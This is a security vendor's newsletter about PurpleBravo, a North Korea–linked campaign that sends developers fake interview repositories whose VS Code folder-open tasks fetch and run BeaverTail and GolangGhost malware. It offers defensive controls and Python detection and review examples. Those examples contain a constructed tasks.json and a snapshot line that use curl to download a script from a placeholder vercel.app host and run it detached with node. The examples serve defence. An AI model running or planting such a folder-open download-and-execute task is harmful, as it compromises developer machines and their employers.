April 11, 2026 Newsletter
North Korea–linked operators tracked as PurpleBravo are scaling a proven playbook: lure developers with recruiter outreach, push “interview” coding assignments, then weaponize trusted developer workflows to land malware on real endpoints.
Insikt Group tied the activity to 3,136 IP addresses associated with likely targets and identified 20 potential victim organizations across multiple industries.
Key takeaways
Developer recruitment lures are now a repeatable initial access vector, not a one-off scam.
Trusted tooling is the delivery mechanism: Git repos, VS Code projects, task configuration files, and staged payloads.
The impact can jump from individual to enterprise fast when candidates run “tests” on corporate devices.
This is both espionage and theft-driven activity, aligned with the broader Contagious Interview cluster.
What happened
Insikt Group assessed that PurpleBravo targeted 3,136 individual IP addresses from August 2024 through September 2025, with targeting concentrated in South Asia and North America. The 20 potential victim organizations spanned AI, cryptocurrency, financial services, IT services, marketing, and software development, and were based in countries including Belgium, Bulgaria, Costa Rica, India, Italy, the Netherlands, Pakistan, Romania, the UAE, and Vietnam.
A critical operational detail: in several cases, candidates likely executed malicious code on corporate devices, creating exposure that extends beyond the job seeker to their employer and downstream customers.
How the attack works in practice
PurpleBravo blends social engineering with developer-tool abuse to reduce friction and increase execution rates.
1) Persona-led recruitment lures
Operators used LinkedIn personas posing as developers and recruiters, supported by malicious GitHub repositories designed to deliver known malware families.
2) “Interview project” delivery via Git repositories
Victims clone a repository and open it in Visual Studio Code as part of a supposed technical assignment. VS Code's Workspace Trust prompt asks whether to trust the folder's authors; granting trust lets VS Code act on the project's own configuration, including task definitions in .vscode/tasks.json that run shell commands.
3) VS Code task abuse for execution
Jamf documented abuse of .vscode/tasks.json to execute attacker-controlled commands, including tasks configured to run on folder open (runOptions.runOn set to folderOpen), which VS Code launches as soon as the victim opens the folder in a trusted workspace, with no build or test step required.
4) Payload staging from trusted hosting
Jamf observed payloads staged on vercel.app infrastructure and executed via Node.js on macOS using background shell execution patterns: output redirected away and the process detached, so the payload keeps running after VS Code exits.
5) Malware toolchain and C2 operations
Insikt Group reported PurpleBravo-managed C2 for BeaverTail (JavaScript infostealer/loader) and GolangGhost (Go-based backdoor, also tracked as FlexibleFerret or WeaselStore), with infrastructure hosted across 17 providers and administered via Astrill VPN with activity observed from IP ranges in China.
Why this matters: the IT software supply chain is the target
This campaign is not limited to “developer compromise.” The supply-chain angle is structural:
Many targets operate in IT services and staff augmentation, often advertising large customer bases, which creates downstream risk if a provider’s developer workstation becomes a foothold.
The compromise pathway bypasses traditional perimeter narratives by abusing everyday workflows: hiring, coding tests, repositories, and IDE configuration.
Insikt Group also highlighted intersections between PurpleBravo and North Korean IT worker activity tracked separately as PurpleDelta, reinforcing that “job-related access” is a strategic lane for DPRK operations, not a single tactic.
Defensive playbook: controls that actually break the chain
Stopping this class of attack requires tightening how developer environments handle untrusted code and how corporate devices are used during recruiting.
Hiring workflow controls
Require interview coding assessments to run only inside a company-managed sandbox environment, not on employee primary endpoints.
Prohibit using corporate devices for external interview take-homes unless the environment is isolated and disposable.
Treat “recruiter-provided repos” as untrusted software supply chain inputs with mandatory review gates.
Developer workstation hardening
Enforce application control policies for script interpreters and developer runtimes where feasible, especially Node.js execution paths used for chained payloads on macOS.
Restrict outbound access from developer endpoints to high-risk hosting patterns when not required for business, including free application-hosting platforms such as the vercel.app subdomains observed in this campaign; allow-list the specific projects a team actually uses rather than leaving the whole platform open.
Improve endpoint detection coverage for IDE-launched child processes, suspicious shell usage, and “download-and-execute” behaviors.
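As an added example (not from the article, Jamf, or Insikt Group), the following Python walks a constructed macOS process snapshot and implements the two detections this list asks for: an interpreter launched beneath VS Code that fetches and backgrounds a payload, and a Node.js process that has already been detached and reparented to launchd (pid 1) while running a script from a temporary or hidden path. The process names, paths and the vercel.app hostname are illustrative assumptions, not observed indicators.

```python
"""Detection pass over a process snapshot for IDE-launched download-and-execute
behaviour. Added example, not the article's or any vendor's code; the snapshot,
process names and paths are constructed and illustrative."""
import re

# Assumed names of VS Code processes on macOS (the main process is an Electron binary).
IDE_NAMES = {"Code", "Code Helper", "Code Helper (Plugin)", "Code Helper (Renderer)", "Electron"}
INTERPRETERS = {"sh", "bash", "zsh", "node", "python", "python3"}
FETCH_RX = re.compile(r"\b(curl|wget)\b.*https?://", re.I)
DETACH_RX = re.compile(r"\bnohup\b|\bdisown\b|>\s*/dev/null|&\s*$")
# A script run from a temp dir or from a dotfile under the user's home, e.g. /tmp/.setup.js
TEMP_SCRIPT_RX = re.compile(r"(^|\s)(/tmp/|/private/tmp/|/var/folders/|/Users/[^/\s]+/\.)\S*\.(js|sh|py)\b")

# Constructed snapshot, not real telemetry. pid 1 is launchd, which adopts detached children.
SNAPSHOT = [
    {"pid": 1,   "ppid": 0,   "name": "launchd", "cmdline": "/sbin/launchd"},
    {"pid": 500, "ppid": 1,   "name": "Code",    "cmdline": "/Applications/Visual Studio Code.app/Contents/MacOS/Electron"},
    {"pid": 512, "ppid": 500, "name": "Code Helper (Plugin)", "cmdline": "Code Helper (Plugin) --type=utility"},
    {"pid": 530, "ppid": 512, "name": "sh",
     "cmdline": "sh -c curl -s https://example-project.vercel.app/setup.js -o /tmp/.setup.js && nohup node /tmp/.setup.js >/dev/null 2>&1 &"},
    {"pid": 541, "ppid": 1,   "name": "node",    "cmdline": "node /tmp/.setup.js"},
    {"pid": 560, "ppid": 512, "name": "node",    "cmdline": "node /Users/dev/project/node_modules/.bin/eslint src"},
    {"pid": 570, "ppid": 1,   "name": "node",    "cmdline": "node /Users/dev/project/server.js"},
]

def ancestors(proc, by_pid):
    """Ancestors of proc, nearest first; the seen-set guards against pid-reuse cycles."""
    seen = set()
    parent = by_pid.get(proc["ppid"])
    while parent is not None and parent["pid"] not in seen:
        seen.add(parent["pid"])
        yield parent
        parent = by_pid.get(parent["ppid"])

def detect(snapshot):
    """Alerts for (a) an interpreter beneath the IDE that fetches and backgrounds a payload and
    (b) a Node.js process already reparented to launchd and running a script from a temp/hidden path."""
    by_pid = {p["pid"]: p for p in snapshot}
    alerts = []
    for p in snapshot:
        if p["name"] not in INTERPRETERS:
            continue
        cmd = p["cmdline"]
        ide = next((a["name"] for a in ancestors(p, by_pid) if a["name"] in IDE_NAMES), None)
        if ide and FETCH_RX.search(cmd) and DETACH_RX.search(cmd):
            alerts.append({"pid": p["pid"], "rule": "ide_download_and_detach", "ide_ancestor": ide})
        if p["ppid"] == 1 and p["name"] == "node" and TEMP_SCRIPT_RX.search(cmd):
            alerts.append({"pid": p["pid"], "rule": "orphaned_node_temp_script", "ide_ancestor": None})
    return alerts
```

On the sample snapshot only the shell under the plugin host (pid 530) and the orphaned node process (pid 541) alert; the eslint run under VS Code and a long-lived dev server reparented to launchd are not flagged. The second rule matters because once the shell has exited, the parent-child link to VS Code is gone and the payload survives only as a detached node process.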
VS Code and repository guardrails
Disable automatic tasks (the VS Code setting task.allowAutomaticTasks) or tightly govern them, keep Workspace Trust enabled, and treat the trust prompt as a security decision: open unfamiliar repositories in Restricted Mode until they have been reviewed.
Require that any repository containing task automation (.vscode/tasks.json, and in particular folderOpen tasks) be reviewed before it is opened in a trusted workspace.
Add code-scanning gates for repos and enforce secrets scanning to reduce the blast radius if compromise occurs.
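One way to implement the review gate called for here and under the hiring-workflow controls above, as an added example that is not code from the article, Jamf or Insikt Group: a Python scanner for a cloned repository's .vscode/tasks.json. VS Code reads that file as JSON with comments and trailing commas, so the scanner strips those first, then flags tasks set to run on folder open (runOptions.runOn == "folderOpen") and command lines showing download-and-execute or detached-background traits. The sample file is constructed for the example; its label, commands and vercel.app hostname are placeholders, not indicators from the campaign.

```python
"""Review gate for an untrusted repository's .vscode/tasks.json. Added example, not code
from the article, Jamf or Insikt Group; the sample file below is constructed."""
import json
import re

# Constructed sample of what an "interview project" might ship; the vercel.app host is a placeholder.
SAMPLE_TASKS_JSON = r'''{
  // Build configuration for the take-home assignment
  "version": "2.0.0",
  "tasks": [
    {
      "label": "Install dependencies",
      "type": "shell",
      "command": "sh",
      "args": ["-c", "curl -s https://example-project.vercel.app/setup.js -o /tmp/.setup.js && nohup node /tmp/.setup.js >/dev/null 2>&1 &"],
      "runOptions": { "runOn": "folderOpen" },
      "presentation": { "reveal": "never" },
    },
    { "label": "Run tests", "type": "npm", "script": "test", }
  ]
}'''

# Command-line traits worth a human look; auto_run and hidden_terminal come from task options.
RISKY = [
    ("download", re.compile(r"\b(curl|wget|Invoke-WebRequest|iwr)\b", re.I)),
    ("remote_url", re.compile(r"https?://", re.I)),
    ("interpreter", re.compile(r"\b(node|python3?|sh|bash|zsh|powershell|pwsh)\b")),
    ("eval_inline", re.compile(r"\b(node|python3?)\s+-[ce]\b")),
    ("background", re.compile(r"\bnohup\b|\bdisown\b|>\s*/dev/null|&\s*$")),
]

# String literals are matched first, so a "//" inside a URL is never mistaken for a comment.
# The last alternative is a comma followed (possibly via whitespace/comments) by a closer.
_JSONC_TOKEN = re.compile(
    r'"(?:\\.|[^"\\])*"|//[^\n]*|/\*.*?\*/|,(?=(?:\s|//[^\n]*|/\*.*?\*/)*[}\]])', re.S)

def strip_jsonc(text):
    """Remove comments and trailing commas, leaving string literals untouched."""
    return _JSONC_TOKEN.sub(lambda m: m.group(0) if m.group(0).startswith('"') else "", text)

def parse_jsonc(text):
    return json.loads(strip_jsonc(text))

def _command_lines(task):
    """Shell text of a task plus its per-OS overrides (an "osx" block can carry the real command)."""
    lines = []
    for section in (task, *(task.get(k, {}) for k in ("windows", "osx", "linux"))):
        parts = [section.get("command"), *section.get("args", [])]
        parts = [p.get("value") if isinstance(p, dict) else p for p in parts]  # {"value": .., "quoting": ..} form
        words = [p for p in parts if isinstance(p, str)]
        if words:
            lines.append(" ".join(words))
    if "script" in task:                                                     # "type": "npm" tasks
        lines.append("npm run " + str(task["script"]))
    return lines

def review_tasks(jsonc_text):
    """One finding per task: its commands, whether it auto-runs on folder open, and the traits matched."""
    findings = []
    for task in parse_jsonc(jsonc_text).get("tasks", []):
        commands = _command_lines(task)
        flags = {name for line in commands for name, rx in RISKY if rx.search(line)}
        auto_run = (task.get("runOptions") or {}).get("runOn") == "folderOpen"
        if auto_run:
            flags.add("auto_run")
        if (task.get("presentation") or {}).get("reveal") == "never":
            flags.add("hidden_terminal")
        findings.append({"label": task.get("label"), "auto_run": auto_run,
                         "commands": commands, "flags": sorted(flags)})
    return findings

def verdict(findings):
    """block: an auto-run task that fetches, evaluates inline or backgrounds something;
    review: any other flagged task; allow: nothing flagged."""
    for f in findings:
        flags = set(f["flags"])
        if "auto_run" in flags and flags & {"download", "remote_url", "eval_inline", "background"}:
            return "block"
    return "review" if any(f["flags"] for f in findings) else "allow"
```

Against the sample, the first task is flagged for auto_run, background, download, hidden_terminal, interpreter and remote_url and the file gets the verdict "block", while a repository whose only task is a plain npm test script is allowed. Run the gate on the clone before opening it in VS Code, and pair it with task.allowAutomaticTasks set to "off" on corporate endpoints so a folderOpen task cannot fire before the review happens.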
Identity and credential theft containment
Assume that browser-stored credentials and cryptocurrency wallets are being targeted wherever BeaverTail-class tooling is present, and enforce strong session controls, password manager policies, and rapid token revocation workflows.
InfoSight perspective: treat developer tools as part of exposure management
PurpleBravo’s success comes from exploiting a gap in many security programs: developer tooling and workflows are often treated as “productivity plumbing,” not as first-class attack surface.
InfoSight’s approach aligns with continuous exposure management: inventory the tooling that can execute code, measure where exposure concentrates, and drive remediation based on real-world attacker tradecraft rather than generic best practices.
Where InfoSight Mitigator Vulnerability & Threat Management fits this specific problem set:
Asset and software visibility for developer endpoints, build runners, and critical toolchains so unapproved runtimes and risky configurations do not hide in plain sight.
Risk-based prioritization that emphasizes exploit-driven pathways and reduces time-to-remediation for the exposures most likely to enable initial access and credential theft.
Operational reporting that tracks remediation performance over time, showing whether exposure windows are shrinking or simply shifting.
PurpleBravo is a reminder that modern software supply chain risk includes the people and tools that produce software, not only the packages and pipelines.